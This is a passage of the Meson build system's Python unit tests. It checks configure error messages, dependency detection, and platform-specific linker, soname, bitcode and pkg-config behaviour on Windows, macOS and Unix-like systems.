f.write(contents)
# Run in-process for speed and consistency with assertMesonRaises
return self.init(self.srcdir, extra_args=extra_args, inprocess=True)
def assertMesonOutputs(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents outputs
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertRegex(out, match)
def assertMesonDoesNotOutput(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents does not output
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertNotRegex(out, match)
@skipIfNoPkgconfig
def test_dependency(self):
if subprocess.call(['pkg-config', '--exists', 'zlib']) != 0:
raise unittest.SkipTest('zlib not found with pkg-config')
a = (("dependency('zlib', method : 'fail')", "'fail' is invalid"),
("dependency('zlib', static : '1')", "[Ss]tatic.*boolean"),
("dependency('zlib', version : 1)", "Item must be a list or one of <class 'str'>"),
("dependency('zlib', required : 1)", "[Rr]equired.*boolean"),
("dependency('zlib', method : 1)", "[Mm]ethod.*string"),
("dependency('zlibfail')", self.dnf),)
for contents, match in a:
self.assertMesonRaises(contents, match)
def test_apple_frameworks_dependency(self):
if not is_osx():
raise unittest.SkipTest('only run on macOS')
self.assertMesonRaises("dependency('appleframeworks')",
"requires at least one module")
def test_extraframework_dependency_method(self):
code = "dependency('python', method : 'extraframework')"
if not is_osx():
self.assertMesonRaises(code, self.dnf)
else:
# Python2 framework is always available on macOS
self.assertMesonOutputs(code, '[Dd]ependency.*python.*found.*YES')
def test_sdl2_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('sdl2-config'):
raise unittest.SkipTest('sdl2-config found')
self.assertMesonRaises("dependency('sdl2', method : 'sdlconfig')", self.dnf)
if shutil.which('pkg-config'):
self.assertMesonRaises("dependency('sdl2', method : 'pkg-config')", self.dnf)
with no_pkgconfig():
# Look for pkg-config, cache it, then
# Use cached pkg-config without erroring out, then
# Use cached pkg-config to error out
code = "dependency('foobarrr', method : 'pkg-config', required : false)\n" \
"dependency('foobarrr2', method : 'pkg-config', required : false)\n" \
"dependency('sdl2', method : 'pkg-config')"
self.assertMesonRaises(code, self.nopkg)
def test_gnustep_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('gnustep-config'):
raise unittest.SkipTest('gnustep-config found')
self.assertMesonRaises("dependency('gnustep')",
"(requires a Objc compiler|{})".format(self.dnf),
langs = ['objc'])
def test_wx_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('wx-config-3.0') or shutil.which('wx-config') or shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('wx-config, wx-config-3.0 or wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets')", self.dnf)
self.assertMesonOutputs("dependency('wxwidgets', required : false)",
"Run-time dependency .*WxWidgets.* found: .*NO.*")
def test_wx_dependency(self):
if not shutil.which('wx-config-3.0') and not shutil.which('wx-config') and not shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('Neither wx-config, wx-config-3.0 nor wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets', modules : 1)",
"module argument is not a string")
def test_llvm_dependency(self):
self.assertMesonRaises("dependency('llvm', modules : 'fail')",
"(required.*fail|{})".format(self.dnf))
def test_boost_notfound_dependency(self):
# Can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost', modules : 1)",
"module.*not a string")
self.assertMesonRaises("dependency('boost', modules : 'fail')",
"(fail.*not found|{})".format(self.dnf))
def test_boost_BOOST_ROOT_dependency(self):
# Test BOOST_ROOT; can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost')",
"(BOOST_ROOT.*absolute|{})".format(self.dnf),
override_envvars = {'BOOST_ROOT': 'relative/path'})
def test_dependency_invalid_method(self):
code = '''zlib_dep = dependency('zlib', required : false)
zlib_dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, ".* is not a config-tool dependency")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_pkgconfig_variable('foo')
'''
self.assertMesonRaises(code, "Method.*pkgconfig.*is invalid.*internal")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, "Method.*configtool.*is invalid.*internal")
def test_objc_cpp_detection(self):
'''
Test that when we can't detect objc or objcpp, we fail gracefully.
'''
env = get_fake_env()
try:
env.detect_objc_compiler(MachineChoice.HOST)
env.detect_objcpp_compiler(MachineChoice.HOST)
except EnvironmentException:
code = "add_languages('objc')\nadd_languages('objcpp')"
self.assertMesonRaises(code, "Unknown compiler")
return
raise unittest.SkipTest("objc and objcpp found, can't test detection failure")
def test_subproject_variables(self):
'''
Test that:
1. The correct message is outputted when a not-required dep is not
found and the fallback subproject is also not found.
2. A not-required fallback dependency is not found because the
subproject failed to parse.
3. A not-found not-required dep with a fallback subproject outputs the
correct message when the fallback subproject is found but the
variable inside it is not.
4. A fallback dependency is found from the subproject parsed in (3)
5. The correct message is outputted when the .wrap file is missing for
a sub-subproject.
'''
tdir = os.path.join(self.unit_test_dir, '20 subproj dep variables')
out = self.init(tdir, inprocess=True)
self.assertRegex(out, r"Subproject directory not found and .*nosubproj.wrap.* file not found")
self.assertRegex(out, r'Function does not take positional arguments.')
self.assertRegex(out, r'WARNING:.* Dependency .*subsubproject.* not found but it is available in a sub-subproject.')
self.assertRegex(out, r'Subproject directory not found and .*subsubproject.wrap.* file not found')
self.assertRegex(out, r'Dependency .*zlibproxy.* from subproject .*subprojects.*somesubproj.* found: .*YES.*')
def test_exception_exit_status(self):
'''
Test exit status on python exception
'''
tdir = os.path.join(self.unit_test_dir, '21 exit status')
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(tdir, inprocess=False, override_envvars = {'MESON_UNIT_TEST': '1'})
self.assertEqual(cm.exception.returncode, 2)
self.wipe()
def test_dict_requires_key_value_pairs(self):
self.assertMesonRaises("dict = {3, 'foo': 'bar'}",
'Only key:value pairs are valid in dict construction.')
self.assertMesonRaises("{'foo': 'bar', 3}",
'Only key:value pairs are valid in dict construction.')
def test_dict_forbids_duplicate_keys(self):
self.assertMesonRaises("dict = {'a': 41, 'a': 42}",
'Duplicate dictionary key: a.*')
def test_dict_forbids_integer_key(self):
self.assertMesonRaises("dict = {3: 'foo'}",
'Key must be a string.*')
def test_using_too_recent_feature(self):
# Here we use a dict, which was introduced in 0.47.0
self.assertMesonOutputs("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.46.0')
def test_using_recent_feature(self):
# Same as above, except the meson version is now appropriate
self.assertMesonDoesNotOutput("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.47')
def test_using_too_recent_feature_dependency(self):
self.assertMesonOutputs("dependency('pcap', required: false)",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.41.0')
def test_vcs_tag_featurenew_build_always_stale(self):
'https://github.com/mesonbuild/meson/issues/3904'
vcs_tag = '''version_data = configuration_data()
version_data.set('PROJVER', '@VCS_TAG@')
vf = configure_file(output : 'version.h.in', configuration: version_data)
f = vcs_tag(input : vf, output : 'version.h')
'''
msg = '.*WARNING:.*feature.*build_always_stale.*custom_target.*'
self.assertMesonDoesNotOutput(vcs_tag, msg, meson_version='>=0.43')
def test_missing_subproject_not_required_and_required(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub2 = subproject('not-found-subproject', required: true)",
""".*Subproject "subprojects/not-found-subproject" required but not found.*""")
def test_get_variable_on_not_found_project(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub1.get_variable('naaa')",
"""Subproject "subprojects/not-found-subproject" disabled can't get_variable on it.""")
def test_version_checked_before_parsing_options(self):
'''
https://github.com/mesonbuild/meson/issues/5281
'''
options = "option('some-option', type: 'foo', value: '')"
match = 'Meson version is.*but project requires >=2000'
self.assertMesonRaises("", match, meson_version='>=2000', options=options)
def test_assert_default_message(self):
self.assertMesonRaises("k1 = 'a'\n" +
"assert({\n" +
" k1: 1,\n" +
"}['a'] == 2)\n",
r"Assert failed: {k1 : 1}\['a'\] == 2")
def test_wrap_nofallback(self):
self.assertMesonRaises("dependency('notfound', fallback : ['foo', 'foo_dep'])",
r"Dependency \'notfound\' not found and fallback is disabled",
extra_args=['--wrap-mode=nofallback'])
def test_message(self):
self.assertMesonOutputs("message('Array:', ['a', 'b'])",
r"Message:.* Array: \['a', 'b'\]")
def test_warning(self):
self.assertMesonOutputs("warning('Array:', ['a', 'b'])",
r"WARNING:.* Array: \['a', 'b'\]")
def test_override_dependency_twice(self):
self.assertMesonRaises("meson.override_dependency('foo', declare_dependency())\n" +
"meson.override_dependency('foo', declare_dependency())",
"""Tried to override dependency 'foo' which has already been resolved or overridden""")
@unittest.skipIf(is_windows(), 'zlib is not available on Windows')
def test_override_resolved_dependency(self):
self.assertMesonRaises("dependency('zlib')\n" +
"meson.override_dependency('zlib', declare_dependency())",
"""Tried to override dependency 'zlib' which has already been resolved or overridden""")
@unittest.skipUnless(is_windows() or is_cygwin(), "requires Windows (or Windows via Cygwin)")
class WindowsTests(BasePlatformTests):
'''
Tests that should run on Cygwin, MinGW, and MSVC
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/windows')
@unittest.skipIf(is_cygwin(), 'Test only applicable to Windows')
def test_find_program(self):
'''
Test that Windows-specific edge-cases in find_program are functioning
correctly. Cannot be an ordinary test because it involves manipulating
PATH to point to a directory with Python scripts.
'''
testdir = os.path.join(self.platform_test_dir, '8 find program')
# Find `cmd` and `cmd.exe`
prog1 = ExternalProgram('cmd')
self.assertTrue(prog1.found(), msg='cmd not found')
prog2 = ExternalProgram('cmd.exe')
self.assertTrue(prog2.found(), msg='cmd.exe not found')
self.assertPathEqual(prog1.get_path(), prog2.get_path())
# Find cmd with an absolute path that's missing the extension
cmd_path = prog2.get_path()[:-4]
prog = ExternalProgram(cmd_path)
self.assertTrue(prog.found(), msg='{!r} not found'.format(cmd_path))
# Finding a script with no extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script'))
self.assertTrue(prog.found(), msg='test-script not found')
# Finding a script with an extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script-ext.py'))
self.assertTrue(prog.found(), msg='test-script-ext.py not found')
# Finding a script in PATH
os.environ['PATH'] += os.pathsep + testdir
# Finding a script in PATH w/o extension works and adds the interpreter
# (check only if `.PY` is in PATHEXT)
if '.PY' in [ext.upper() for ext in os.environ['PATHEXT'].split(';')]:
prog = ExternalProgram('test-script-ext')
self.assertTrue(prog.found(), msg='test-script-ext not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Finding a script in PATH with extension works and adds the interpreter
prog = ExternalProgram('test-script-ext.py')
self.assertTrue(prog.found(), msg='test-script-ext.py not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Ensure that WindowsApps gets removed from PATH
path = os.environ['PATH']
if 'WindowsApps' not in path:
username = os.environ['USERNAME']
appstore_dir = r'C:\Users\{}\AppData\Local\Microsoft\WindowsApps'.format(username)
path = os.pathsep + appstore_dir
path = ExternalProgram._windows_sanitize_path(path)
self.assertNotIn('WindowsApps', path)
def test_ignore_libs(self):
'''
Test that find_library on libs that are to be ignored returns an empty
array of arguments. Must be a unit test because we cannot inspect
ExternalLibraryHolder from build files.
'''
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Not using MSVC')
# To force people to update this test, and also test
self.assertEqual(set(cc.ignore_libs), {'c', 'm', 'pthread', 'dl', 'rt', 'execinfo'})
for l in cc.ignore_libs:
self.assertEqual(cc.find_library(l, env, []), [])
def test_rc_depends_files(self):
testdir = os.path.join(self.platform_test_dir, '5 resources')
# resource compiler depfile generation is not yet implemented for msvc
env = get_fake_env(testdir, self.builddir, self.prefix)
depfile_works = env.detect_c_compiler(MachineChoice.HOST).get_id() not in {'msvc', 'clang-cl', 'intel-cl'}
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Test compile_resources(depend_file:)
# Changing mtime of sample.ico should rebuild prog
self.utime(os.path.join(testdir, 'res', 'sample.ico'))
self.assertRebuiltTarget('prog')
# Test depfile generation by compile_resources
# Changing mtime of resource.h should rebuild myres.rc and then prog
if depfile_works:
self.utime(os.path.join(testdir, 'inc', 'resource', 'resource.h'))
self.assertRebuiltTarget('prog')
self.wipe()
if depfile_works:
testdir = os.path.join(self.platform_test_dir, '12 resources with custom targets')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of resource.h should rebuild myres_1.rc and then prog_1
self.utime(os.path.join(testdir, 'res', 'resource.h'))
self.assertRebuiltTarget('prog_1')
def test_msvc_cpp17(self):
testdir = os.path.join(self.unit_test_dir, '45 vscpp17')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
try:
self.init(testdir)
except subprocess.CalledProcessError:
# According to Python docs, output is only stored when
# using check_output. We don't use it, so we can't check
# that the output is correct (i.e. that it failed due
# to the right reason).
return
self.build()
def test_install_pdb_introspection(self):
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
self.init(testdir)
installed = self.introspect('--installed')
files = [os.path.basename(path) for path in installed.values()]
self.assertTrue('prog.pdb' in files)
def _check_ld(self, name: str, lang: str, expected: str) -> None:
if not shutil.which(name):
raise unittest.SkipTest('Could not find {}.'.format(name))
envvars = [mesonbuild.envconfig.BinaryTable.evarMap['{}_ld'.format(lang)]]
# Also test a deprecated variable if there is one.
if envvars[0] in mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP:
envvars.append(
mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP[envvars[0]])
for envvar in envvars:
with mock.patch.dict(os.environ, {envvar: name}):
env = get_fake_env()
try:
comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest('Could not find a compiler for {}'.format(lang))
self.assertEqual(comp.linker.id, expected)
def test_link_environment_variable_lld_link(self):
env = get_fake_env()
comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('lld-link', 'c', 'lld-link')
def test_link_environment_variable_link(self):
env = get_fake_env()
comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('link', 'c', 'link')
def test_link_environment_variable_optlink(self):
env = get_fake_env()
comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('optlink', 'c', 'optlink')
@skip_if_not_language('rust')
def test_link_environment_variable_rust(self):
self._check_ld('link', 'rust', 'link')
@skip_if_not_language('d')
def test_link_environment_variable_d(self):
env = get_fake_env()
comp = getattr(env, 'detect_d_compiler')(MachineChoice.HOST)
if comp.id == 'dmd':
raise unittest.SkipTest('meson cannot reliably make DMD use a different linker.')
self._check_ld('lld-link', 'd', 'lld-link')
def test_pefile_checksum(self):
try:
import pefile
except ImportError:
if is_ci():
raise
raise unittest.SkipTest('pefile module not found')
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir, extra_args=['--buildtype=release'])
self.build()
# Test that binaries have a non-zero checksum
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
cc_id = cc.get_id()
ld_id = cc.get_linker_id()
dll = glob(os.path.join(self.builddir, '*mycpplib.dll'))[0]
exe = os.path.join(self.builddir, 'cppprog.exe')
for f in (dll, exe):
pe = pefile.PE(f)
msg = 'PE file: {!r}, compiler: {!r}, linker: {!r}'.format(f, cc_id, ld_id)
if cc_id == 'clang-cl':
# Latest clang-cl tested (7.0) does not write checksums out
self.assertFalse(pe.verify_checksum(), msg=msg)
else:
# Verify that a valid checksum was written by all other compilers
self.assertTrue(pe.verify_checksum(), msg=msg)
def test_qt5dependency_vscrt(self):
'''
Test that qt5 dependencies use the debug module suffix when b_vscrt is
set to 'mdd'
'''
# Verify that the `b_vscrt` option is available
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if 'b_vscrt' not in cc.base_options:
raise unittest.SkipTest('Compiler does not support setting the VS CRT')
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt5'):
if not shutil.which('qmake') and not is_ci():
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 5' not in output and not is_ci():
raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
# Setup with /MDd
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Db_vscrt=mdd'])
# Verify that we're linking to the debug versions of Qt DLLs
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('build qt5core.exe: cpp_LINKER.*Qt5Cored.lib', contents)
self.assertIsNotNone(m, msg=contents)
@unittest.skipUnless(is_osx(), "requires Darwin")
class DarwinTests(BasePlatformTests):
'''
Tests that should run on macOS
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/osx')
def test_apple_bitcode(self):
'''
Test that -fembed-bitcode is correctly added while compiling and
-bitcode_bundle is added while linking when b_bitcode is true and not
when it is false. This can't be an ordinary test case because we need
to inspect the compiler database.
'''
testdir = os.path.join(self.platform_test_dir, '7 bitcode')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.id != 'clang':
raise unittest.SkipTest('Not using Clang on OSX')
# Try with bitcode enabled
out = self.init(testdir, extra_args='-Db_bitcode=true')
# Warning was printed
self.assertRegex(out, 'WARNING:.*b_bitcode')
# Compiler options were added
for compdb in self.get_compdb():
if 'module' in compdb['file']:
self.assertNotIn('-fembed-bitcode', compdb['command'])
else:
self.assertIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
# Linker options were added
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNotNone(m, msg=contents)
# Try with bitcode disabled
self.setconf('-Db_bitcode=false')
# Regenerate build
self.build()
for compdb in self.get_compdb():
self.assertNotIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNone(m, msg=contents)
def test_apple_bitcode_modules(self):
'''
Same as above, just for shared_module()
'''
testdir = os.path.join(self.common_test_dir, '152 shared module resolving symbol in executable')
# Ensure that it builds even with bitcode enabled
self.init(testdir, extra_args='-Db_bitcode=true')
self.build()
self.run_tests()
def _get_darwin_versions(self, fname):
fname = os.path.join(self.builddir, fname)
out = subprocess.check_output(['otool', '-L', fname], universal_newlines=True)
m = re.match(r'.*version (.*), current version (.*)\)', out.split('\n')[1])
self.assertIsNotNone(m, msg=out)
return m.groups()
@skipIfNoPkgconfig
def test_library_versioning(self):
'''
Ensure that compatibility_version and current_version are set correctly
'''
testdir = os.path.join(self.platform_test_dir, '2 library versions')
self.init(testdir)
self.build()
targets = {}
for t in self.introspect('--targets'):
targets[t['name']] = t['filename'][0] if isinstance(t['filename'], list) else t['filename']
self.assertEqual(self._get_darwin_versions(targets['some']), ('7.0.0', '7.0.0'))
self.assertEqual(self._get_darwin_versions(targets['noversion']), ('0.0.0', '0.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlyversion']), ('1.0.0', '1.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlysoversion']), ('5.0.0', '5.0.0'))
self.assertEqual(self._get_darwin_versions(targets['intver']), ('2.0.0', '2.0.0'))
self.assertEqual(self._get_darwin_versions(targets['stringver']), ('2.3.0', '2.3.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistver']), ('2.4.0', '2.4.0'))
self.assertEqual(self._get_darwin_versions(targets['intstringver']), ('1111.0.0', '2.5.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistvers']), ('2.6.0', '2.6.1'))
def test_duplicate_rpath(self):
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
# We purposely pass a duplicate rpath to Meson, in order
# to ascertain that Meson does not call install_name_tool
# with duplicate -delete_rpath arguments, which would
# lead to erroring out on installation
env = {"LDFLAGS": "-Wl,-rpath,/foo/bar"}
self.init(testdir, override_envvars=env)
self.build()
self.install()
def test_removing_unused_linker_args(self):
testdir = os.path.join(self.common_test_dir, '108 has arg')
env = {'CFLAGS': '-L/tmp -L /var/tmp -headerpad_max_install_names -Wl,-export_dynamic -framework Foundation'}
self.init(testdir, override_envvars=env)
@unittest.skipUnless(not is_windows(), "requires something Unix-like")
class LinuxlikeTests(BasePlatformTests):
'''
Tests that should run on Linux, macOS, and *BSD
'''
def test_basic_soname(self):
'''
Test that the soname is set correctly for shared libraries. This can't
be an ordinary test case because we need to run `readelf` and actually
check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '4 shared')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'libmylib.so')
soname = get_soname(lib1)
self.assertEqual(soname, 'libmylib.so')
def test_custom_soname(self):
'''
Test that the soname is set correctly for shared libraries when
a custom prefix and/or suffix is used. This can't be an ordinary test
case because we need to run `readelf` and actually check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '25 library versions')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'prefixsomelib.suffix')
soname = get_soname(lib1)
self.assertEqual(soname, 'prefixsomelib.suffix')
def test_pic(self):
'''
Test that -fPIC is correctly added to static libraries when b_staticpic
is true and not when it is false. This can't be an ordinary test case
because we need to inspect the compiler database.
'''
if is_windows() or is_cygwin() or is_osx():
raise unittest.SkipTest('PIC not relevant')
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir)
compdb = self.get_compdb()
self.assertIn('-fPIC', compdb[0]['command'])
self.setconf('-Db_staticpic=false')
# Regenerate build
self.build()
compdb = self.get_compdb()
self.assertNotIn('-fPIC', compdb[0]['command'])
def test_pkgconfig_gen(self):
'''
Test that generated pkg-config files can be found and have the correct
version and link args. This can't be an ordinary test case because we
need to run pkg-config outside of a Meson build file.
https://github.com/mesonbuild/meson/issues/889
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
self.assertTrue(foo_dep.found())
self.assertEqual(foo_dep.get_version(), '1.0')
self.assertIn('-lfoo', foo_dep.get_link_args())
self.assertEqual(foo_dep.get_pkgconfig_variable('foo', {}), 'bar')
self.assertPathEqual(foo_dep.get_pkgconfig_variable('datadir', {}), '/usr/data')
libhello_nolib = PkgConfigDependency('libhello_nolib', env, kwargs)
self.assertTrue(libhello_nolib.found())
self.assertEqual(libhello_nolib.get_link_args(), [])
self.assertEqual(libhello_nolib.get_compile_args(), [])
def test_pkgconfig_gen_deps(self):
'''
Test that generated pkg-config files correctly handle dependencies
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
privatedir1 = self.privatedir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen', 'dependencies')
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': privatedir1})
privatedir2 = self.privatedir
os.environ
env = {
'PKG_CONFIG_LIBDIR': os.pathsep.join([privatedir1, privatedir2]),
'PKG_CONFIG_SYSTEM_LIBRARY_PATH': '/usr/lib',
}
self._run(['pkg-config', 'dependency-test', '--validate'], override_envvars=env)
# pkg-config strips some duplicated flags so we have to parse the
# generated file ourself.
expected = {
'Requires': 'libexposed',
'Requires.private': 'libfoo >= 1.0',
'Libs': '-L${libdir} -llibmain -pthread -lcustom',
'Libs.private': '-lcustom2 -L${libdir} -llibinternal',
'Cflags': '-I${includedir} -pthread -DCUSTOM',
}
if is_osx() or is_haiku():
expected['Cflags'] = expected['Cflags'].replace('-pthread ', '')
with open(os.path.join(privatedir2, 'dependency-test.pc')) as f:
matched_lines = 0
for line in f:
parts = line.split(':', 1)
if parts[0] in expected:
key = parts[0]
val = parts[1].strip()
expected_val = expected[key]
self.assertEqual(expected_val, val)
matched_lines += 1
self.assertEqual(len(expected), matched_lines)
cmd = ['pkg-config', 'requires-test']
out = self._run(cmd + ['--print-requires'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'requires-private-test']
out = self._run(cmd + ['--print-requires-private'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'pub-lib-order']
out = self._run(cmd + ['--libs'], override_envvars=env).strip().split()
self.assertEqual(out, ['-llibmain2', '-llibinternal'])
# See common/47 pkgconfig-gen/meson.build for description of the case this test
with open(os.path.join(privatedir1, 'simple2.pc')) as f:
content = f.read()
self.assertIn('Libs: -L${libdir} -lsimple2 -lz -lsimple1', content)
with open(os.path.join(privatedir1, 'simple3.pc')) as f:
content = f.read()
self.assertEqual(1, content.count('-lsimple3'))
with open(os.path.join(privatedir1, 'simple5.pc')) as f:
content = f.read()
self.assertNotIn('-lstat2', content)
def test_pkgconfig_uninstalled(self):
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
self.build()
os.environ['PKG_CONFIG_LIBDIR'] = os.path.join(self.builddir, 'meson-uninstalled')
if is_cygwin():
os.environ['PATH'] += os.pathsep + self.builddir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen', 'dependencies')
self.init(testdir)
self.build()
self.run_tests()
def test_pkg_unfound(self):
testdir = os.path.join(self.unit_test_dir, '23 unfound pkgconfig')
self.init(testdir)
with open(os.path.join(self.privatedir, 'somename.pc')) as f:
pcfile = f.read()
self.assertFalse('blub_blob_blib' in pcfile)
def test_vala_c_warnings(self):
'''
Test that no warnings are emitted for C code generated by Vala. This
can't be an ordinary test case because we need to inspect the compiler
database.
https://github.com/mesonbuild/meson/issues/864
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '5 target glib')
self.init(testdir)
compdb = self.get_compdb()
vala_command = None
c_command = None
for each in compdb:
if each['file'].endswith('GLib.Thread.c'):
vala_command = each['command']
elif each['file'].endswith('GLib.Thread.vala'):
continue
elif each['file'].endswith('retcode.c'):
c_command = each['command']
else:
m = 'Unknown file {!r} in vala_c_warnings test'.format(each['file'])
raise AssertionError(m)
self.assertIsNotNone(vala_command)
self.assertIsNotNone(c_command)
# -w suppresses all warnings, should be there in Vala but not in C
self.assertIn(" -w ", vala_command)
self.assertNotIn(" -w ", c_command)
# -Wall enables all warnings, should be there in C but not in Vala
self.assertNotIn(" -Wall ", vala_command)
self.assertIn(" -Wall ", c_command)
# -Werror converts warnings to errors, should always be there since it's
# injected by an unrelated piece of code and the project has werror=true
self.assertIn(" -Werror ", vala_command)
self.assertIn(" -Werror ", c_command)
@skipIfNoPkgconfig
def test_qtdependency_pkgconfig_detection(self):
'''
Test that qt4 and qt5 detection with pkgconfig works.
'''
# Verify Qt4 or Qt5 can be found with pkg-config
qt4 = subprocess.call(['pkg-config', '--exists', 'QtCore'])
qt5 = subprocess.call(['pkg-config', '--exists', 'Qt5Core'])
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=pkg-config'])
# Confirm that the dependency was found with pkg-config
mesonlog = self.get_meson_log()
if qt4 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt4 \(modules: Core\) found: YES 4.* \(pkg-config\)\n')
if qt5 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES 5.* \(pkg-config\)\n')
@skip_if_not_base_option('b_sanitize')
def test_generate_gir_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
